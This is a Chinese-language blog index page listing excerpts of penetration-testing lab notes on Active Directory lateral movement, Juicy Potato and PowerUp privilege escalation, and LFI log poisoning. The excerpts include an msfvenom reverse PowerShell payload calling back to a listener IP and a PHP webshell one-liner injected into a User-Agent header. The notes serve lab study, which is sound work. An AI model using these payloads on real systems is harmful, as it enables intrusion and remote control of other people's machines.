zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
Objective 17-白鸢的笔记

Objective 17

任务• 在 dcorp 域中找到我们具有写入权限的计算机对象。• 滥用写入权限以域管理员身份访问该计算机。 Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'ciadim'}空的 在Je...
9个月前
09410
Arctic  Juicy Potato提权-白鸢的笔记

Arctic Juicy Potato提权

拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
1年前
09410
/var/log/access.log 日志污染-白鸢的笔记

/var/log/access.log 日志污染

目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...
Python类 基础-白鸢的笔记

Python类 基础

1. 类的定义1.1 设计类在程序中设计表格 我们称之为:设计类(class)class Student: name = None #记录学生姓名class是关键字,表示要定义类了类的属性,即定义在类中的变量(成员变量)类的行为...
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译-白鸢的笔记

w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.187 Linux 1. 信息收集如果不把域名放入/etc/hosts的话 那么就掉到兔子洞里了所以把这个写入/etc/hosts中访问weakness.jth/| __ / ...
12个月前
09214
Flimsy-白鸢的笔记

Flimsy

简介point 10Warm upDifficulty Easyrated by community INTERMEDIATE No more flimsy excuses 实验环境攻击者 Kali 192.168.45.200受害者 IP 192.168.200.220   Linux 1. 信息收集收集受...
Active Directory 中的横向移动3 哈希传递和Overpass The Hash-白鸢的笔记

Active Directory 中的横向移动3 哈希传递和Overpass The Hash

1. 哈希传递哈希传递 (PtH) 技术允许攻击者使用用户的 NTLM 哈希而不是关联的明文密码来对远程系统或服务进行身份验证。请注意,这不适用于 Kerberos 身份验证,而仅适用于使用 NTLM 身份验证的...
1年前
08912
权限提升的自动化工具或脚本 PowerUp-白鸢的笔记

权限提升的自动化工具或脚本 PowerUp

1. 介绍PowerUp是一个Powershell程序,使用户能够枚举并潜在地利用针对Windows机器的特权升级机会PowerUp.ps1脚本是属于PowerSploit工具包的一个工具能够扫描并识别windows系统中的错误配置 2....
Active Directory 中的横向移动2 PsExec-白鸢的笔记

Active Directory 中的横向移动2 PsExec

PsExec 是一个非常通用的工具,是 Mark Russinovich 开发的 SysInternals套件的一部分。它旨在取代类似 telnet 的应用程序,并通过交互式控制台在其他系统上提供进程的远程执行。为了滥用该工具...
1年前
08812
Objective 19-白鸢的笔记

Objective 19

任务• 使用 DA 访问 dollarcorp.moneycorp.local,使用 dollarcorp 的 krbtgt 哈希将权限提升至企业管理员或 DA 至父域 moneycorp.local。 >C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rub...
9个月前
08714